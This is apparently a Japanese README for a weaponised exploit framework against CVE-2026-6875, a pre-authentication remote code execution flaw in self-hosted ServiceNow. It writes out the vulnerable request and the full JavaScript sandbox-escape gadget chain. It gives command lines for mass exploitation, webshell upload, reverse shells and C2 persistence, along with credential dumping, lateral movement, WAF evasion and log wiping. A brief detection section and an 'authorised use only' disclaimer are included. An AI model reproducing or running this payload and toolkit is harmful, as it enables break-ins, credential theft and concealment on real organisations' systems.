
CVE-2026-6875 ServiceNow 事前認証RCEフレームワーク 🔥 JSインジェクション → サンドボックスエスケープ → RCE → Root。機能: --detect、--exec、リバース/インタラクティブシェル、バッチスレッド処理、WAFバイパス、永続化、横展開、資格情報ダンプ、ファイルレス実行、痕跡消去。🛡️ CVSS 9.5 活発に悪用されています。許可された合法的な使用のみ。法律を遵守してください。🔒

エクスプロイトフレームワーク & セーフ検証ツール
許可されたセキュリティテストのみを対象としています。
このツールは、教育目的および許可されたペネトレーションテスト専用に提供されています。
著者および貢献者は、本ソフトウェアの誤用または損害について一切の責任を負いません。ユーザーは、テスト前にターゲット所有者から明示的な書面による許可を得ていることを確認する責任を単独で負います。コンピュータシステムへの不正アクセスは、Computer Fraud and Abuse Act(CFAA)および世界中の同様の法律に基づき違法です。
本ソフトウェアを使用することにより、あなたは以下に同意したものとします:
⚠️ 警告: この脆弱性は実環境で活発に悪用されています。不正使用は深刻な法的結果を招く可能性があります。
CVE-2026-6875 は、ServiceNow AI プラットフォーム(旧 Now Platform)における重大な**認証不要のリモートコード実行(RCE)**脆弱性です。攻撃者はスクリプトサンドボックスを回避し、ServiceNow アプリケーションの権限で任意のシステムコマンドを実行できます。
JavaScriptインジェクション: assessment_thanks.do エンドポイントは sysparm_assessable_type パラメータを受け付けます。値の先頭に javascript: を付けることで、攻撃者は任意のJavaScriptコードを注入できます。
サンドボックスエスケープ: 高度なサンドボックスエスケープガジェット(DiscoveryFunctions.getCacheObjectForTable、AbstractAjaxProcessor、Class.create を連鎖させる)により、JavaScriptサンドボックス制限を解除します。
リモートコード実行: 注入されたJavaコード(java.lang.Runtime.exec() 経由)が ServiceNow アプリケーション権限で実行され、システム全体の完全な侵害が可能になります。
権限昇格: ポストエクスプロイテーションモジュールは、sudoの設定ミス、SUIDバイナリ、書き込み可能なcronジョブ、カーネルエクスプロイトを利用してrootへの権限昇格を試みます。
exploit.py)完全な武器化エクスプロイトは、JavaScriptインジェクションとサンドボックスエスケープを連鎖させてリモートコード実行を実現し、永続化、横展開、資格情報ダンプのための高度なポストエクスプロイテーションモジュールを備えています。
verifier.py)セーフ検証ツールは、有害なペイロードを実行したりシステムに変更を加えたりすることなく、非侵入型の脆弱性検出を実行します。
pip(requests ライブラリ用)pip install requests urllib3
[!NOTE]
exploit.pyはコア機能に標準ライブラリのみを使用します。requestsは--detect機能、--webhook通知、およびセーフ検証ツールにのみ必要です。
verifier.py)# Single target verification
python verifier.py -u 192.168.1.100
# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow
# Mass scan from file
python verifier.py -l targets.txt -o results.json
# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q
# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60
# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"
exploit.py)# Interactive shell on target
python exploit.py -u 192.168.1.100
# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect
# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc
# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp
# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444
# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean
# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444
# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090
# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass
# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow
# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow
# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls
# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0
⚠️ 重要: ServiceNow Cloud インスタンスは自動的にパッチ適用されます。この脆弱性は主にセルフホスト型のデプロイに影響します。
この脆弱性は、sysparm_assessable_type パラメータを受け付ける assessment_thanks.do エンドポイントに存在します。javascript: で始まる値を指定すると、プラットフォームは後続の JavaScript をシステムコンテキスト内で評価します。
脆弱なエンドポイント:
POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')
注入されたコードは最初、サンドボックス内に制限されます。しかし、次のチェーンを利用することで:
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);
サンドボックスが回避され、java.lang.Runtime などのJavaクラスへの完全なアクセスが許可されます。
.properties、.xml、.conf ファイルからパスワード、APIキー、シークレットを検索します:
/opt/ServiceNow/conf/*.xml/var/log/ServiceNow/*.log/etc/passwd, /etc/shadow次の方法でバックドアをインストールします:
*/5 * * * *)、systemdサービス、SSHキーschtasks)、レジストリのRunキーローカルサブネット内の他の ServiceNow インスタンスまたは SSH ホストをスキャンし、発見した資格情報を再利用します。
Javaクラスをその場でコンパイルし、ClassLoader を介してロードして、メモリ内で実行します(ディスクへの書き込みなし)。
{/*comment*/})w の場合は \u0077)new の場合は ne\u0077)ServiceNow ログで以下を検索してください:
extraweb_access.log – sysparm_assessable_type に以下を含む /assessment_thanks.do へのリクエスト:
javascript:DiscoveryFunctions.getCacheObjectForTableAbstractAjaxProcessor/var/tmp/ 内の予期しないファイル(例: shell.jsp、.sh スクリプト)/etc/passwd、/etc/shadow、または ~/.ssh/authorized_keyscrontab -l)/etc/systemd/system/)/bin/bash -i、nc、curl、wget、python -c)[+] CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
https://github.com/tc4dy/CVE-2026-15409-15410-Framework
[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
[+] CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit
[+] CVE-2026-41940 - cPanel/WHM Authentication Bypass
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit
| Attribute | Value |
|---|
| 📅 発見日 | 2026年4月1日 (Searchlight Cyber) |
| ⚠️ CVSSスコア | 9.5(CRITICAL) |
| 📋 CISA KEV | 2026年7月13日追加 |
| 🎯 影響を受ける製品 | セルフホスト型 ServiceNow AI プラットフォーム |
| 🔄 修正済みバージョン | Brazil EA/GA、Australia Patch 2、Zurich Patch 7b/9、Yokohama Patch 12 Hot Fix 1b/13 |
| 🔓 認証 | 不要(事前認証) |
| 🌍 実際の悪用 | 実環境での悪用を確認済み(2026年7月) |
| Feature | Description |
|---|
| 🚀 JavaScriptインジェクション | sysparm_assessable_type パラメータを介してペイロードを注入します。 |
| 💻 サンドボックスエスケープ | ServiceNow のスクリプトサンドボックスを回避し、任意のJavaコードを実行します。 |
| 🔐 対話型シェル | 複数のコマンドに対応したライブシェルを起動します。 |
| 👑 root権限昇格 | sudoの設定ミス、SUIDバイナリ、cronジョブをチェックします。 |
| 📁 ファイル操作 | Webシェルをアップロードし、base64エンコードでファイルを読み取り/ダウンロードします。 |
| 🌐 バッチスキャン | スレッド処理(-l フラグ)で複数のターゲットを大量にエクスプロイトします。 |
| 🎯 安全な検出 | 非侵入型の脆弱性検証のためのオプションの --detect フラグ。 |
| ⚙️ WAF回避 | WAF/IDSを回避するための組み込みの難読化テクニック(6種)。 |
| 🧩 永続化 | cron/systemd/schtasksバックドアをインストールします。 |
| 🔍 横展開 | ローカルネットワーク内の他の脆弱性ホストをスキャンし、SSH/SSRF伝播を試みます。 |
| 🧹 痕跡消去 | ログ、bash履歴、監査トレイルを削除します。 |
| 💾 ファイルレス実行 | Java ClassLoader を使用し、ディスクに書き込まずにメモリ常駐ペイロードを実行します。 |
| 🔌 コールバックサーバー | コマンド出力を受信する組み込みHTTPサーバー(オプション)。 |
| 📢 Webhook通知 | 結果をカスタムURL(Slack、Discord など)に送信します。 |
| 🪟 クロスプラットフォーム | Linux および Windows ターゲット(cmd.exe / PowerShell)に対応。 |
| 🔒 スレッドセーフ | 並行操作時にロック機構を使用します。 |
| 📊 バージョン検出 | ServiceNow のバージョン(Zurich/Brazil/Australia/Yokohama)を検出します。 |
| Command | Description |
|---|
exec <cmd> | システムコマンドを実行 |
upload <local> [remote] | ターゲットにWebシェルをアップロード |
download <remote> | ファイルをダウンロードして内容を表示 |
privesc | 権限昇格を試行 |
reverse <host> <port> | リバースシェルを送信 |
dumpcred | ServiceNow 設定から資格情報をダンプ |
persist <host> <port> | 永続化をインストール(cron/systemd/schtasks) |
lateral | 横展開を試行 |
clean | 痕跡を消去(ログ、履歴) |
memory <host> <port> | ファイルレスJavaペイロードを実行 |
exit | 対話型シェルを終了 |
| Feature | Description |
|---|
| 🔍 ServiceNow検出 | 複数のエンドポイントを介して ServiceNow インスタンスを特定します。 |
| 📊 バージョン検出 | 特定の ServiceNow リリースとパッチレベルを検出します。 |
| 🧪 JavaScriptインジェクションテスト | 安全な gs.print() ペイロードを使用してインジェクション脆弱性をテストします。 |
| 🔒 サンドボックスエスケープテスト | 破壊的なコマンドを使用せずにサンドボックスエスケープを検証します。 |
| 📈 信頼度スコアリング | 証拠に基づく信頼度パーセンテージ(85‑95%)を提供します。 |
| 📋 JSON出力 | レポート用に結果をJSON形式でエクスポートします。 |
| 🔄 一括スキャン | スレッド処理に対応し、複数のターゲットをスキャンします。 |
| 🎯 非侵入型 | システム情報のため、無害な uname -a のみを実行します。 |
| ServiceNow リリース | 影響を受けるバージョン | 修正済みバージョン |
|---|
| Brazil | EA、GA | 修正済み(post-GA) |
| Australia | Patch 2 より前 | Patch 2 以降 |
| Zurich | Patch 7b、Patch 9 より前 | Patch 7b、Patch 9 以降 |
| Yokohama | Patch 12 Hot Fix 1b より前 | Patch 12 Hot Fix 1b、Patch 13 |
| その他のリリース | 不明 | 公式アドバイザリを確認 |